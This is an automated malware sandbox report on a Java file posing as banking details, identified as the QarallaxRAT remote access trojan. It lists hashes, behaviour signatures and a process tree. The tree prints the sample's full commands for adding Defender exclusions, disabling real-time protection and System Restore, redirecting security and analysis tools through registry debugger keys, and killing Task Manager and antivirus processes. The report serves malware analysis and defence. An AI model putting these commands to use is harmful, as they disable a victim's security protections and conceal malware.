Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10v200722
  • submitted
    06-08-2020 07:45

General

  • Target

    New Banking Details.jar

  • Size

    410KB

  • MD5

    7ff8c97e2fe1c972876ee4cc84238074

  • SHA1

    fb1d4dff5cedba4dc4eb0ddf662fc9be2d39e696

  • SHA256

    d4a142b9eba6dff66deadaea2777b5ce1d7fc551f94b5e7f87ba6a84709106c9

  • SHA512

    0531582de07c475fa4ebe358d5336ed810fcdb0adbcbcd8738a66b4aa7cd66eeb11837ce63cd534a23ff277f8a5d50e7a806675379f97e8e34cf45ede9d86759

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • QarallaxRAT

    Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).

  • Qarallax RAT support DLL 1 IoCs
  • Disables Task Manager via registry modification
  • Disables use of System Restore points 1 TTPs
  • Sets file execution options in registry 2 TTPs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Drops desktop.ini file(s) 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Kills process with taskkill 19 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 125 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 412 IoCs
  • Views/modifies file attributes 1 TTPs 8 IoCs

Processes

  • C:\ProgramData\Oracle\Java\javapath\java.exe
    java -jar "C:\Users\Admin\AppData\Local\Temp\New Banking Details.jar"
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops desktop.ini file(s)
    • Drops file in System32 directory
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:504
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe
      2⤵
        PID:3560
      • C:\Windows\SYSTEM32\cmd.exe
        cmd.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1864
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:572
      • C:\Windows\SYSTEM32\cmd.exe
        cmd.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4020
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3140
      • C:\Windows\SYSTEM32\attrib.exe
        attrib +h C:\Users\Admin\Oracle
        2⤵
        • Views/modifies file attributes
        PID:3688
      • C:\Windows\SYSTEM32\attrib.exe
        attrib +h +r +s C:\Users\Admin\.ntusernt.ini
        2⤵
        • Views/modifies file attributes
        PID:3172
      • C:\Windows\SYSTEM32\attrib.exe
        attrib -s -r C:\Users\Admin\hmJMe\Desktop.ini
        2⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:4076
      • C:\Windows\SYSTEM32\attrib.exe
        attrib +s +r C:\Users\Admin\hmJMe\Desktop.ini
        2⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:1064
      • C:\Windows\SYSTEM32\attrib.exe
        attrib -s -r C:\Users\Admin\hmJMe
        2⤵
        • Views/modifies file attributes
        PID:1152
      • C:\Windows\SYSTEM32\attrib.exe
        attrib +s +r C:\Users\Admin\hmJMe
        2⤵
        • Views/modifies file attributes
        PID:1376
      • C:\Windows\SYSTEM32\attrib.exe
        attrib +h C:\Users\Admin\hmJMe
        2⤵
        • Views/modifies file attributes
        PID:1476
      • C:\Windows\SYSTEM32\attrib.exe
        attrib +h +s +r C:\Users\Admin\hmJMe\Lwqbj.class
        2⤵
        • Views/modifies file attributes
        PID:3540
      • C:\Windows\SYSTEM32\cmd.exe
        cmd.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3960
        • C:\Windows\system32\reg.exe
          reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
          3⤵
            PID:3264
          • C:\Windows\system32\reg.exe
            reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
            3⤵
              PID:4440
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\hmJMe','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\hmJMe\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:2684
          • C:\Windows\System32\taskkill.exe
            "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
            2⤵
            • Kills process with taskkill
            PID:3620
          • C:\Windows\System32\reg.exe
            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
            2⤵
              PID:1268
            • C:\Windows\System32\reg.exe
              "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
              2⤵
                PID:60
              • C:\Windows\System32\reg.exe
                "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                2⤵
                  PID:3044
                • C:\Windows\System32\reg.exe
                  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
                  2⤵
                    PID:3776
                  • C:\Windows\System32\reg.exe
                    "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                    2⤵
                      PID:1492
                    • C:\Windows\System32\reg.exe
                      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
                      2⤵
                        PID:572
                      • C:\Windows\System32\reg.exe
                        "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                        2⤵
                          PID:2604
                        • C:\Windows\System32\reg.exe
                          "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
                          2⤵
                            PID:1440
                          • C:\Windows\System32\reg.exe
                            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                            2⤵
                              PID:3564
                            • C:\Windows\System32\reg.exe
                              "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
                              2⤵
                                PID:1120
                              • C:\Windows\System32\reg.exe
                                "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                2⤵
                                  PID:4260
                                • C:\Windows\System32\reg.exe
                                  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
                                  2⤵
                                    PID:4284
                                  • C:\Windows\System32\reg.exe
                                    "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                    2⤵
                                      PID:4364
                                    • C:\Windows\System32\reg.exe
                                      "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
                                      2⤵
                                        PID:4404
                                      • C:\Windows\System32\reg.exe
                                        "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                        2⤵
                                          PID:4488
                                        • C:\Windows\System32\reg.exe
                                          "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
                                          2⤵
                                            PID:4500
                                          • C:\Windows\System32\taskkill.exe
                                            "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
                                            2⤵
                                            • Kills process with taskkill
                                            PID:4528
                                          • C:\Windows\System32\reg.exe
                                            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
                                            2⤵
                                              PID:4600
                                            • C:\Windows\System32\reg.exe
                                              "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                              2⤵
                                                PID:4640
                                              • C:\Windows\System32\reg.exe
                                                "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                2⤵
                                                  PID:4724
                                                • C:\Windows\System32\reg.exe
                                                  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                  2⤵
                                                    PID:4740
                                                  • C:\Windows\System32\reg.exe
                                                    "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                    2⤵
                                                      PID:4824
                                                    • C:\Windows\System32\reg.exe
                                                      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                      2⤵
                                                        PID:4832
                                                      • C:\Windows\System32\reg.exe
                                                        "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                        2⤵
                                                          PID:4976
                                                        • C:\Windows\System32\reg.exe
                                                          "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                          2⤵
                                                            PID:4988
                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                            cmd.exe
                                                            2⤵
                                                              PID:1332
                                                              • C:\Windows\system32\reg.exe
                                                                reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:64
                                                                3⤵
                                                                  PID:4144
                                                                • C:\Windows\system32\reg.exe
                                                                  reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:32
                                                                  3⤵
                                                                    PID:4448
                                                                • C:\Windows\System32\reg.exe
                                                                  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                  2⤵
                                                                    PID:3836
                                                                  • C:\Windows\System32\reg.exe
                                                                    "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                    2⤵
                                                                      PID:1400
                                                                    • C:\Windows\System32\reg.exe
                                                                      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                      2⤵
                                                                        PID:3144
                                                                      • C:\Windows\System32\reg.exe
                                                                        "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                        2⤵
                                                                          PID:1140
                                                                        • C:\Windows\System32\taskkill.exe
                                                                          "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
                                                                          2⤵
                                                                          • Kills process with taskkill
                                                                          PID:4268
                                                                        • C:\Windows\System32\reg.exe
                                                                          "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                          2⤵
                                                                            PID:3892
                                                                          • C:\Windows\System32\reg.exe
                                                                            "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                            2⤵
                                                                              PID:4112
                                                                            • C:\Windows\System32\reg.exe
                                                                              "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                              2⤵
                                                                                PID:4208
                                                                              • C:\Windows\System32\reg.exe
                                                                                "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
                                                                                2⤵
                                                                                  PID:4312
                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                  cmd.exe
                                                                                  2⤵
                                                                                    PID:4028
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
                                                                                      3⤵
                                                                                        PID:4668
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
                                                                                        3⤵
                                                                                          PID:4284
                                                                                      • C:\Windows\System32\taskkill.exe
                                                                                        "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
                                                                                        2⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:4624
                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                        cmd.exe
                                                                                        2⤵
                                                                                          PID:4368
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
                                                                                            3⤵
                                                                                              PID:4760
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
                                                                                              3⤵
                                                                                                PID:4484
                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                              cmd.exe
                                                                                              2⤵
                                                                                                PID:4540
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
                                                                                                  3⤵
                                                                                                    PID:4492
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
                                                                                                    3⤵
                                                                                                      PID:4512
                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                    cmd.exe
                                                                                                    2⤵
                                                                                                      PID:5064
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
                                                                                                        3⤵
                                                                                                          PID:4640
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
                                                                                                          3⤵
                                                                                                            PID:4764
                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                          cmd.exe
                                                                                                          2⤵
                                                                                                            PID:4596
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
                                                                                                              3⤵
                                                                                                                PID:5100
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
                                                                                                                3⤵
                                                                                                                  PID:4740
                                                                                                              • C:\Windows\System32\taskkill.exe
                                                                                                                "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
                                                                                                                2⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:4744
                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                cmd.exe
                                                                                                                2⤵
                                                                                                                  PID:1496
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
                                                                                                                    3⤵
                                                                                                                      PID:5016
                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
                                                                                                                      3⤵
                                                                                                                        PID:4832
                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                      cmd.exe
                                                                                                                      2⤵
                                                                                                                        PID:5032
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
                                                                                                                          3⤵
                                                                                                                            PID:4024
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
                                                                                                                            3⤵
                                                                                                                              PID:2364
                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                            cmd.exe
                                                                                                                            2⤵
                                                                                                                              PID:4988
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:5060
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
                                                                                                                                  3⤵
                                                                                                                                    PID:5052
                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                  cmd.exe
                                                                                                                                  2⤵
                                                                                                                                    PID:3988
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
                                                                                                                                      3⤵
                                                                                                                                        PID:3748
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
                                                                                                                                        3⤵
                                                                                                                                          PID:1400
                                                                                                                                      • C:\Windows\System32\taskkill.exe
                                                                                                                                        "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
                                                                                                                                        2⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:4120
                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                        cmd.exe
                                                                                                                                        2⤵
                                                                                                                                          PID:4180
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
                                                                                                                                            3⤵
                                                                                                                                              PID:4272
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:928
                                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                              cmd.exe
                                                                                                                                              2⤵
                                                                                                                                                PID:1140
                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
                                                                                                                                                  3⤵
                                                                                                                                                    PID:3688
                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
                                                                                                                                                    3⤵
                                                                                                                                                      PID:3628
                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                    cmd.exe
                                                                                                                                                    2⤵
                                                                                                                                                      PID:3540
                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
                                                                                                                                                        3⤵
                                                                                                                                                          PID:3948
                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
                                                                                                                                                          3⤵
                                                                                                                                                            PID:4008
                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                          cmd.exe
                                                                                                                                                          2⤵
                                                                                                                                                            PID:4052
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
                                                                                                                                                              3⤵
                                                                                                                                                                PID:3088
                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:3736
                                                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                cmd.exe
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:2648
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:4268
                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:3620
                                                                                                                                                                    • C:\Windows\System32\taskkill.exe
                                                                                                                                                                      "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                      PID:4800
                                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                      cmd.exe
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:4144
                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:4564
                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:4788
                                                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                            cmd.exe
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:4324
                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:64
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:4400
                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:32
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:4716
                                                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:4760
                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:4644
                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:4460
                                                                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                        cmd.exe
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:4916
                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:4040
                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:1780
                                                                                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                              cmd.exe
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:4648
                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:1332
                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:4364
                                                                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                    cmd.exe
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:4108
                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:4600
                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:4848
                                                                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                          cmd.exe
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:4740
                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
